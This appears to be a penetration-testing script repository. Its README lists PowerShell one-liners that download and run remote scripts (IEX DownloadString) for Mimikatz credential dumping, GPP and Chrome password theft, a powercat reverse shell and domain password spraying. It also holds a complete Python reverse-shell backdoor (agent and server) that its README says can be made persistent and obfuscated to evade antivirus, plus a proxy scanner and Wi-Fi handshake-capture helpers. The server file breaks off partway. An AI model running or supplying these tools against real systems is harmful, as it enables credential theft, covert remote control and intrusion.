```
├── PowerShellScripts
│   └── README.md
├── README.md
├── proxyVulnHunter
│   ├── README.md
│   └── proxyVulnHunter.py
├── simple_backdoor_demo
│   ├── README.md
│   ├── agent.py
│   └── server.py
└── wifi_security_helper
    ├── README.md
    ├── pinger.py
    ├── port_banner_scan.py
    └── wifi_helper.py
```

--------------------------------------------------------------------------------
/PowerShellScripts/README.md:
--------------------------------------------------------------------------------
Some useful and interesting PowerShell scripts for internal network and domain penetration testing

- #### [Discover-PSMSSQLServers](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSSQLServers)
  This script discovers MSSQL services in the Active Directory forest via ADSI.
  - `powershell -exec bypass -Command "&{Import-Module .\Discover-PSMSSQLServers.ps1; Discover-PSMSSQLServers}" > C:\Windows\Temp\Discover-PSMSSQLServers.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers" > C:\Windows\Temp\Discover-PSMSSQLServers.txt`

- #### [Discover-PSInterestingServices](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices)
  This script discovers interesting services in the Active Directory forest via LDAP.
  - `powershell -exec bypass -Command "&{Import-Module .\Discover-PSInterestingServices.ps1; Discover-PSInterestingServices}" > C:\Windows\Temp\Discover-PSInterestingServices.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSInterestingServices'); Discover-PSInterestingServices" > C:\Windows\Temp\Discover-PSInterestingServices.txt`

- #### [Discover-PSMSExchangeServers](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers)
  This script discovers Exchange servers in the Active Directory forest via LDAP.
  - `powershell -exec bypass -Command "&{Import-Module .\Discover-PSMSExchangeServers.ps1; Discover-PSMSExchangeServers}" > C:\Windows\Temp\Discover-PSMSExchangeServers.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSExchangeServers'); Discover-PSMSExchangeServers" > C:\Windows\Temp\Discover-PSMSExchangeServers.txt`

- #### [Find-PSServiceAccounts](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts)
  This script discovers ServicePrincipalName service accounts in the AD domain or forest.
  - `powershell -exec bypass -Command "&{Import-Module .\Find-PSServiceAccounts.ps1; Find-PSServiceAccounts}" > C:\Windows\Temp\Find-PSServiceAccounts.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Find-PSServiceAccounts'); Find-PSServiceAccounts" > C:\Windows\Temp\Find-PSServiceAccounts.txt`

- #### [Get-DomainKerberosPolicy](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-DomainKerberosPolicy)
  This script gets the domain Kerberos policy; the Group Policy module must be installed.
  - `powershell -exec bypass -Command "&{Import-Module .\Get-DomainKerberosPolicy.ps1; Get-DomainKerberosPolicy}" > C:\Windows\Temp\Get-DomainKerberosPolicy.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Get-DomainKerberosPolicy'); Get-KerberosPolicy" > C:\Windows\Temp\Get-DomainKerberosPolicy.txt`

- #### [Get-PSADForestInfo](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo)
  This script collects domain environment information.
  - `powershell -exec bypass -Command "&{Import-Module .\Get-PSADForestInfo.ps1; Get-PSADForestInfo}" > C:\Windows\Temp\Get-PSADForestInfo.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Get-PSADForestInfo'); Get-PSADForestInfo" > C:\Windows\Temp\Get-PSADForestInfo.txt`

- #### [Get-PSADForestKRBTGTInfo](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestKRBTGTInfo)
  This script collects information on all KRBTGT accounts.
  - `powershell -exec bypass -Command "&{Import-Module .\Get-PSADForestKRBTGTInfo.ps1; Get-PSADForestKRBTGTInfo}" > C:\Windows\Temp\Get-PSADForestKRBTGTInfo.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Get-PSADForestKRBTGTInfo'); Get-PSADForestKRBTGTInfo" > C:\Windows\Temp\Get-PSADForestKRBTGTInfo.txt`

- #### [Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
  This is the PowerShell exploitation script for the GPP (Group Policy Preferences) vulnerability: it searches the domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns the plaintext passwords they contain.
  - `powershell -exec bypass -Command "&{Import-Module .\Get-GPPPassword.ps1; Get-GPPPassword}" > C:\Windows\Temp\Get-GPPPassword.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1'); Get-GPPPassword" > C:\Windows\Temp\Get-GPPPassword.txt`

- #### [Get-GPPAutologon](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1)
  This script searches registry.xml on the domain controller for autologon information and returns the username and password.
  - `powershell -exec bypass -Command "&{Import-Module .\Get-GPPAutologon.ps1; Get-GPPAutologon}" > C:\Windows\Temp\Get-GPPAutologon.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPAutologon.ps1'); Get-GPPAutologon" > C:\Windows\Temp\Get-GPPAutologon.txt`

- #### [Invoke-Mimikatz](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1)
  The PowerShell version of mimikatz for dumping plaintext passwords.
  - `powershell -exec bypass -Command "&{Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz -DumpCreds}" > C:\Windows\Temp\Invoke-Mimikatz.txt`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" > C:\Windows\Temp\Invoke-Mimikatz.txt`

- #### [Powerview](https://github.com/ericshoemaker/PowerView/blob/master/Powerview.ps1)
  Domain information gathering script
  - Invoke-UserHunter: find the machines in the onedomain domain that domain admins have logged on to (locating domain admins)
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-UserHunter -Domain 'onedomain'}" > C:\Windows\Temp\onedomainadmins.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-UserHunter -Domain \"onedomain\"" > C:\Windows\Temp\onedomainadmins.txt`
  - Invoke-UserHunter: find the machines that the specified user someone has logged on to (locating a domain user)
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-UserHunter -UserName \"someone\"}" > C:\Windows\Temp\Someone.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-UserHunter -UserName \"someone\"" > C:\Windows\Temp\Someone.txt`
  - Invoke-UserHunterThreaded: find the machines that the specified user someone has logged on to; the multi-threaded version of Invoke-UserHunter (locating a domain user)
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-UserHunterThreaded -UserName \"someone\"}" > C:\Windows\Temp\someone.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-UserHunterThreaded -UserName \"someone\"" > C:\Windows\Temp\someone.txt`
  - Invoke-StealthUserHunter: find the machines from which domain admins in the onedomain domain have sessions (session from), by checking the network sessions on the default public file servers and the SPN records
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-StealthUserHunter -Domain 'onedomain'}" > C:\Windows\Temp\onedomainadmins.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-StealthUserHunter -Domain \"onedomain\"" > C:\Windows\Temp\onedomainadmins.txt`
  - Invoke-StealthUserHunter: find the machines from which the specified user someone has sessions (session from), by checking the network sessions on the default public file servers and the SPN records
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-StealthUserHunter -UserName \"someone\"}" > C:\Windows\Temp\someone.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-StealthUserHunter -UserName \"someone\"" > C:\Windows\Temp\Someone.txt`
  - Invoke-Netview: get domain information for the hosts in the domain, the users logged on to each host, and the share sessions established by each host
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-Netview}" > C:\Windows\Temp\netview.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-Netview" > C:\Windows\Temp\netview.txt`
  - Invoke-NetviewThreaded: get domain information for the hosts in the domain, the users logged on to each host, and the share sessions established by each host; the multi-threaded version of Invoke-Netview
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-NetviewThreaded}" > C:\Windows\Temp\netview.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-NetviewThreaded" > C:\Windows\Temp\netviewt.txt`
  - Invoke-ShareFinder: find established share sessions
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-ShareFinder}" > C:\Windows\Temp\sharefinder.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-ShareFinder" > C:\Windows\Temp\sharefinder.txt`
  - Invoke-ShareFinderThreaded: the multi-threaded version of Invoke-ShareFinder
    - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-ShareFinderThreaded}" > C:\Windows\Temp\sharefinder.txt`
    - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-ShareFinderThreaded" > C:\Windows\Temp\sharefinder.txt`

- #### [Get-ChromeDump](https://github.com/xorrior/RandomPS-Scripts/blob/master/Get-ChromeDump.ps1)
  Script to dump Chrome browser history and saved passwords
  - `powershell -exec bypass -Command "&{Import-Module .\Get-ChromeDump.ps1; Get-ChromeDump -OutFile 'C:\Windows\Temp\ChromeDump.txt'}"`
  - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/Get-ChromeDump.ps1'); Get-ChromeDump -OutFile 'C:\Windows\Temp\ChromeDump.txt'"`

- #### [HostEnum](https://github.com/threatexpress/red-team-scripts/blob/master/HostEnum.ps1)
  - Enumerate local host information, including: detailed OS information, hostname, uptime, install date, installed applications and patches, network adapter configuration, network shares, listening ports, connections, routing table, DNS cache, firewall status, running processes and installed services, interesting registry keys, local users/groups/administrators, personal security product status, antivirus processes, interesting file locations and keyword searches via file indexing, interesting Windows logs (user logons), browser history and more, and generate an HTML page for review and analysis
    - `powershell -exec bypass -Command "&{Import-Module .\HostEnum.ps1; Invoke-HostEnum -Local -HTMLReport -Verbose}"`
    - `powershell -exec bypass -Command "IEX (new-object net.webclient).DownloadString('https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1'); Invoke-HostEnum -Local -HTMLReport -Verbose"`
  - Enumerate domain information
    - `powershell -exec bypass -Command "&{Import-Module .\HostEnum.ps1; Invoke-HostEnum -Domain -HTMLReport -Verbose}"`
    - `powershell -exec bypass -Command "IEX (new-object net.webclient).DownloadString('https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1');Invoke-HostEnum -Domain -HTMLReport -Verbose"`

- #### [powercat](https://github.com/besimorhino/powercat/blob/master/powercat.ps1)
  PowerShell version of nc
  Reverse shell
  - `powershell -exec bypass -Command "&{Import-Module .\powercat.ps1; powercat -c IP -p PORT -e cmd}"`
  - `powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c IP -p PORT -e cmd"`

- #### [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)
  Domain user brute-force script
  - Brute-force with all users of the current domain and the specified password password
    - `powershell -exec bypass -Command "&{Import-Module .\DomainPasswordSpray.ps1; Invoke-DomainPasswordSpray -Password password}"`
    - `powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password password"`
  - Brute-force the specified domain domain-name with the specified user list file users.txt and password list file passlist.txt, writing the output to the specified file sprayed-creds.txt
    - `powershell -exec bypass -Command "&{Import-Module .\DomainPasswordSpray.ps1; Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt}"`
    - `powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt"`

- #### [PowerUp](https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1)
  - Find weaknesses that may be usable for privilege escalation
    - `powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks -HTMLReport`

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# PentestScripts
Some scripts for penetration testing

- [PowerShellScripts](https://github.com/WyAtu/PentestScripts/tree/master/PowerShellScripts)

  Some useful and interesting PowerShell scripts for internal network and domain penetration testing

- [proxyVulnHunter](https://github.com/WyAtu/PentestScripts/tree/master/proxyVulnHunter)

  A script for proactively finding web servers (especially nginx servers) that may proxy requests into the intranet because of misconfiguration

- [wifi_security_helper](https://github.com/WyAtu/PentestScripts/tree/master/wifi_security_helper)

  Some scripts for WiFi attack and defence

  - [wifi_helper.py](https://github.com/WyAtu/PentestScripts/blob/master/wifi_security_helper/wifi_helper.py) : a simple Aircrack-ng capture wrapper for physical penetration tests. After specifying the wireless interface and the ESSID (or BSSID; case-insensitive and partial matches are supported), just bring the device within range of the WiFi under test, run the script and put the device in a pocket or bag, or operate it remotely (requires another script); it captures the handshake automatically (with luck in about ten-odd seconds). And remember to practise running~

  - [pinger.py](https://github.com/WyAtu/PentestScripts/blob/master/wifi_security_helper/pinger.py) : discover the subnets in a (WiFi) network

  - [port_banner_scan.py](https://github.com/WyAtu/PentestScripts/blob/master/wifi_security_helper/port_banner_scan.py) : get open ports and their banners; if a web service is running on an open port, the script also fetches the web page title

- [simple_backdoor_demo](https://github.com/WyAtu/PentestScripts/tree/master/simple_backdoor_demo)
  A simple Python TCP reverse shell backdoor

--------------------------------------------------------------------------------
/proxyVulnHunter/README.md:
--------------------------------------------------------------------------------
### proxyVulnHunter
#### What's proxyVulnHunter
proxyVulnHunter is a script for proactively finding web servers, especially nginx servers, that may proxy requests into the intranet because of misconfiguration.
#### Case
1. https://sites.google.com/site/testsitehacking/10k-host-header
2. https://mp.weixin.qq.com/s/EtUmfMxxJjYNl7nIOKkRmA
3. http://wy.daochuan.net/bug_detail.php?wybug_id=wooyun-2015-0131169
4. http://www.secevery.com:4321/bugs/wooyun-2014-083202
5. http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191121.html
#### Usage
Required
```
-t --target, target IP/URL/CIDR
or
-f --file, target file
```
Optional
```
-p --port, use default ports for the target without port
-o --outfile, output file
-T --thread, thread, default: 100
```
`(default ports: 80, 81, 82, 85, 89, 90, 443, 8000, 8001, 8002, 8008, 8080, 8081, 8082, 8088, 8090, 8100, 8108, 8200, 8888, 9000)`

#### Example
```
proxyVulnHunter -t https://www.google.com
proxyVulnHunter -t http://www.google.com
proxyVulnHunter -t www.google.com
proxyVulnHunter -t www.google.com:443
proxyVulnHunter -t 192.168.1.1
proxyVulnHunter -t 192.168.1.1:8080
proxyVulnHunter -t 192.168.2.0/24 -T 200
proxyVulnHunter -t www.google.com:443 www.bing.com 192.168.2.0/24 -o test.txt
proxyVulnHunter -f input.txt -o test.txt
input.txt:
www.google.com:443
www.bing.com
192.168.2.0/24
https://www.baidu.com
http://www.google.com:80
...
```
If `-p` is used, proxyVulnHunter checks the specified port for targets that have a port set, and the default ports for targets without one.

`proxyVulnHunter -t www.google.com:443 www.bing.com 192.168.2.0/24 -o test.txt -p`

--------------------------------------------------------------------------------
/proxyVulnHunter/proxyVulnHunter.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python
#
# proxyVulnHunter.py
# Proactively find web servers which may proxy to enter the intranet due to wrong configuration, especially nginx servers
#
# Case:
# 1. https://sites.google.com/site/testsitehacking/10k-host-header
# 2. https://mp.weixin.qq.com/s/EtUmfMxxJjYNl7nIOKkRmA
# 3. http://wy.daochuan.net/bug_detail.php?wybug_id=wooyun-2015-0131169
# 4. http://www.secevery.com:4321/bugs/wooyun-2014-083202
# 5. http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191121.html
# More:
# https://github.com/WyAtu/PentestScripts/proxyVulnHunter/blob/master/README.md
#

import sys
import json
import Queue
import socket
import requests
import argparse
import threading
from netaddr import IPNetwork

timeout = 3
mutex = threading.Lock()
result = []
web_port = list(set([80, 81, 82, 85, 89, 90, 443, 8000, 8001, 8002, 8008, 8080, 8081, 8082, 8088, 8090, 8100, 8108, 8200, 8888, 9000]))

def get_ip():
    # Public egress IP of this host, as seen by an external IP echo service
    url = "http://ip.360.cn/IPShare/info"
    try:
        req = requests.get(url, timeout=timeout)
        req_json = json.loads(req.content)
        return req_json['ip']
    except:
        sys.exit("[-] Can't get ip")

def get_ip_by_proxy(proxy):
    # Same lookup routed through the candidate host; falls back to the direct IP on failure
    url = "http://ip.360.cn/IPShare/info"
    proxies = {'http': 'http://'+proxy, 'https': 'https://'+proxy}
    try:
        req = requests.get(url, proxies=proxies, timeout=timeout)
        req_json = json.loads(req.content)
        return req_json['ip']
    except:
        return get_ip()

def get_target_from_file(filename):
    target = []
    try:
        fp = open(filename, 'r+')
        for i in fp.readlines():
            if i.strip() != "": target.append(i.strip())
        fp.close()
        return target
    except:
        sys.exit('[-] Load file error')

def format_ip_dict(ip_dict):
    # Queue entries are "target--ip[:port]" strings
    for target, ip in ip_dict.items():
        if isinstance(ip, list):
            map(lambda x: q.put(x), [target+'--'+i for i in ip])
        else:
            q.put(target+'--'+ip)

def format_input(target):
    # Accepts CIDR, host[:port] or IP[:port]; expands to the default ports when -p is set
    target_re = target.replace('http://', '').replace('https://', '').rstrip('/')
    try:
        if args.port == False:
            ip_list = [ip.format() for ip in IPNetwork(target_re)]
        else:
            ip_list = sum(([[ip+':'+str(port) if ':' not in ip else ip_list.append(ip) for port in web_port] for ip in [ip.format() for ip in IPNetwork(target_re)]]), [])
    except:
        try:
            url, port = target_re.split(':')
            ip = socket.gethostbyname(url)
            ip_list = ip+':'+port
        except:
            try:
                ip = socket.gethostbyname(target_re)
                if args.port == True and ':' not in ip:
                    ip_list = [ip+':'+str(port) for port in web_port]
                else:
                    ip_list = ip
            except:
                ip_list = ""
    return {target : ip_list}

def checker():
    # A host is reported as a proxy when the egress IP seen through it differs from our own
    while not q.empty():
        try:
            target, ip = q.get().split('--')
            result_print = "[*] %s--%s is not proxy"%(target, ip) if ip == "" or get_ip() == get_ip_by_proxy(ip) \
                else "[+] %s--%s is a proxy"%(target, ip)
            mutex.acquire()
            print result_print
            if '[+]' in result_print:
                try:
                    fp.writelines(target+'--'+ip+'\n')
                    fp.flush()
                except:
                    pass
                result.append(target+'--'+ip)
            mutex.release()
        except:
            pass
        finally:
            q.task_done()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='%s'%(sys.argv[0]))
    exptypegroup = parser.add_mutually_exclusive_group()
    exptypegroup.add_argument('-t', '--target', type=str, nargs='+', help="target IP/URL/CIDR")
    exptypegroup.add_argument('-f', '--file', type=str, help="target file")
    parser.add_argument('-p', '--port', action='store_true', help="use default ports for the target without port")
    parser.add_argument('-o', '--output', type=str, help="output file")
    parser.add_argument('-T', '--thread', type=int, default=100, help="thread, default: 100")
    args = parser.parse_args()

    if len(sys.argv) < 2:
        sys.exit(parser.print_help())
    if args.target == None and args.file == None:
        sys.exit('[-] use -t/--target or -f/--file to set target, -h to show help')

    target = get_target_from_file(args.file) if args.file != None else args.target

    if args.output != None:
        try:
            fp = open(args.output, 'a+')
        except:
            sys.exit('[-] open output file failed')

    ip_dict_list = map(format_input, target)

    q = Queue.Queue()
    map(format_ip_dict, ip_dict_list)

    threads = [threading.Thread(target=checker) for i in range(args.thread)]
    map(lambda x: x.start(), threads)
    q.join()
    map(lambda x: sys.stdout.write(x+'\n'), result)
    try:
        fp.close()
    except:
        pass
```

--------------------------------------------------------------------------------
/simple_backdoor_demo/README.md:
--------------------------------------------------------------------------------
This is a simple TCP reverse shell backdoor.

Its usage is somewhat similar to msf sessions.

It can listen on multiple ports, accept multiple socket connections, avoid abnormal exits caused by some commands, avoid the main process being killed outright when antivirus is triggered, come back online after the server listens again, and avoid commands that run for a long time without result. It is compatible with Linux/Windows; after starting, the client keeps waiting for the server to start listening, and can reconnect after the user exits.

Run as a service and set to start at boot, it can be used as a persistent backdoor.

On Windows it can be packaged into an exe with pyinstaller, or obfuscated with pyarmor and then packaged into an exe; the antivirus evasion is fairly good.

First published on [secquan.org](https://www.secquan.org/Share/1068502).

--------------------------------------------------------------------------------
/simple_backdoor_demo/agent.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-

import sys
import socket
import platform
from getpass import getuser
from time import time, sleep
from subprocess import Popen
from tempfile import TemporaryFile

def get_input():
    if len(sys.argv) <3 or len(sys.argv) > 4:
        sys.exit('[-] Usage: %s reverse_ip/domain reverse_port [remark]'%(sys.argv[0]))
    try:
        host = socket.gethostbyname(sys.argv[1])
        port = int(sys.argv[2])
        remark = str(sys.argv[3])
    except socket.gaierror:
        sys.exit('[-] reverse_ip/domain %s error'%(sys.argv[1]))
    except ValueError:
        sys.exit('[-] port must be a int number')
    except IndexError:
        remark = ""
    except:
        sys.exit('[-] Usage: %s reverse_ip/domain reverse_port [remark]'%(sys.argv[0]))
    return host, port, remark

def get_host_info(remark, port):
    # Check-in string: eight '---'-separated fields ending with the command timeout and the port
    global TIMEOUT
    hostname = system = ips = user = arch = ""
    try:
        hostname = str(platform.node())
        system = str(platform.platform())
        arch = str(platform.machine())
        user = getuser()
        ips = " ".join(socket.gethostbyname_ex(socket.gethostname())[2])
    except:
        hostname = "can't get hostname" if hostname == "" else hostname
        system = "can't get platform" if system == "" else system
        arch = "can't get arch" if arch == "" else arch
        user = "can't get user" if user == "" else user
        ips = "can't get ips" if ips == "" else ips
    return "%s---%s---%s---%s---%s---%s---%d---%d"%(hostname, system, arch, user, ips, remark, TIMEOUT, port)

def establish_connection(host, port, host_info):
    # Every message to the server is a 16-digit zero-padded length followed by the payload
    global CONN_FLAG
    try:
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.connect((host, int(port)))
        CONN_FLAG = 1
        conn.send(str(len(host_info)).zfill(16)+host_info)
        return conn
    except:
        CONN_FLAG = 0
        sleep(5)

def run_command(conn, command):
    global TIMEOUT
    temp_out = TemporaryFile(mode='w+')
    fileno = temp_out.fileno()
    p = Popen(command, shell=True, stdout=fileno, stderr=fileno)
    start_time = time()
    while p.poll() == None:
        if time() > start_time + TIMEOUT:
            temp_out.seek(0)
            result = temp_out.read()
            temp_out.close()
            break
    if 'closed' not in str(temp_out):
        temp_out.seek(0)
        result = temp_out.read()
        temp_out.close()
    conn.send(str(len(result)).zfill(16)+result)

if __name__=="__main__":
    CONN_FLAG = 0
    EXIT_FLAG = 0
    TIMEOUT = 5

    host, port, remark = get_input()
    host_info = get_host_info(remark, port)

    while not EXIT_FLAG:
        conn = establish_connection(host, port, host_info)
        while CONN_FLAG:
            try:
                command = str(conn.recv(1024))
                if command == "killsession()":
                    EXIT_FLAG = 1
                    break
                elif command == "info()":
                    host_info = get_host_info(remark, port)
                    conn.send(str(len(host_info)).zfill(16)+host_info)
                elif command.startswith("set timeout "):
                    try:
                        TIMEOUT = int(command.split()[2])
                        result = "[+] TIMEOUT has been set to %d"%(TIMEOUT)
                    except:
                        result = "[-] set timeout TIMEOUT, TIMEOUT should be an integer number"
                    conn.send(str(len(result)).zfill(16)+result)
                else:
                    run_command(conn, command)
            except:
                break

    conn.close()
```

--------------------------------------------------------------------------------
/simple_backdoor_demo/server.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-

import sys
import random
import socket
import threading

def show_help():
    help_message = """
[*] Show the help info
    help(): show this help info
    exit(): exit the terminal of the server
    set port PORT: set the listen port
    start: start to listen
    sessions: show the established sessions
    entersession SESSIONID: enter the specified session
    killsession SESSIONID: kill the process of the specified SESSIONID client
"""
    print help_message

def show_session_help():
    help_message = """
[*] Show the session help info
    help(): show this help info
    exit(): exit the session
    killsession(): kill the process of the client
    info(): show the info of the selected session
    set timeout TIMEOUT: set the timeout of a command
"""
    print help_message

def random_sessionid():
    return ''.join([random.choice('ABCDEFGH1234567890') for i in range(6)])

def recv_result(conn):
    # Reads the 16-digit length prefix, then keeps receiving until the payload is complete
    result = conn.recv(1024)
    total_size = long(result[:16])
    result = result[16:]
    while total_size > len(result):
        data = conn.recv(1024)
        result += data
    return result

def accept_socket(conn):
    host_info = recv_result(conn)
    hostname, system, arch, user, ips, remark, timeout, port = host_info.split('---')
    for _ in SOCK_LIST:
        if hostname == _['hostname'] and ips == _['ips'] and remark == _["remark"] and port == _['port']:
            conn.close()
            return
    sessionid = random_sessionid()
    print "[+] Session established from: %s, Press 'Enter' to continue"%(sessionid)
    conn_dict = {
        'sessionid' : sessionid,
        'hostname' : hostname,
        'system' : system,
        'arch' : arch,
        'user' : user,
        'ips' : ips,
        'remark' : remark,
        'timeout' : timeout,
        'port' : port,
        'conn' : conn,
    }
    SOCK_LIST.append(conn_dict)

def show_host_info(session):
    host_info = """
[*] The host info of Session %s
    Hostname: %s
    Remark: %s
    System: %s
    Arch: %s
    User: %s
    IP: %s
    CommandTimeout: %s
    ConnectionPort: %s
"""%(session['sessionid'], session['hostname'], session['remark'],\
        session['system'], session['arch'], session['user'], session['ips'], session['timeout'], session['port'])
    print host_info

def start_listen(port):
    try:
        host = '0.0.0.0'
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.bind((host, port))
        s.listen(100)
        while 1:
            conn, addr = s.accept()
            accept_socket(conn)

    except socket.error:
        print '[-] Listen failed, please use a free port'

def kill_session(sessionid, conn):
    conn.send("killsession()")
    print "[*] kill the process of the client %s"%(sessionid)
    for _ in SOCK_LIST:
        if sessionid.lower() == _['sessionid'].lower():
            SOCK_LIST.remove(_)

def enter_session(session):
    sessionid = session['sessionid']
    conn = session['conn']
    remark = str(session['remark'])
    while 1:
        try:
            command = raw_input("$ %s@%s> "%(remark, sessionid))
            if command == "":
                continue
            elif command == "exit()":
                print "[*] exit the session %s"%(sessionid)
                break
            elif command == "killsession()":
                kill_session(sessionid, conn)
                break
            elif command == "help()":
                show_session_help()
            elif command == "info()":
                conn.send(command)
                try:
                    session['timeout'] = recv_result(conn).split('---')[6]
                except:
                    pass
                show_host_info(session)
            else:
                conn.send(command)
                print recv_result(conn)
        except:
            pass

if __name__=="__main__":
    SOCK_LIST = []
    while 1:
        command = raw_input("#> ")
        if command == 'help()':
            show_help()
        elif command == "exit()":
            print "[*] User exit"
            break
        elif command.startswith('set port'):
            try:
                port = int(command.split()[2])
            except Exception as e:
                print '[-] set port PORT, PORT should be an integer number range 1-65535'
        elif command == "start":
            try:
                t = threading.Thread(target=start_listen, args=(port,))
                t.setDaemon(True)
                t.start()
            except NameError:
                print '[-] Please set the PORT first'
        elif command == 'sessions':
            print "%-15s%-30s%-10s%-50s%-20s"%('SessionID', 'Hostname', 'User', 'IP', 'Remark')
            for _ in SOCK_LIST:
                print "%-15s%-30s%-10s%-50s%-20s"%(_['sessionid'], _['hostname'], _['user'], _['ips'], _['remark'])
        elif command.startswith('entersession'):
            try:
                sessionid = command.split()[1]
                session_flag = 0
                for _ in SOCK_LIST:
                    if sessionid.lower() == _['sessionid'].lower():
                        print "[*] Enter the session %s"%(sessionid)
                        enter_session(_)
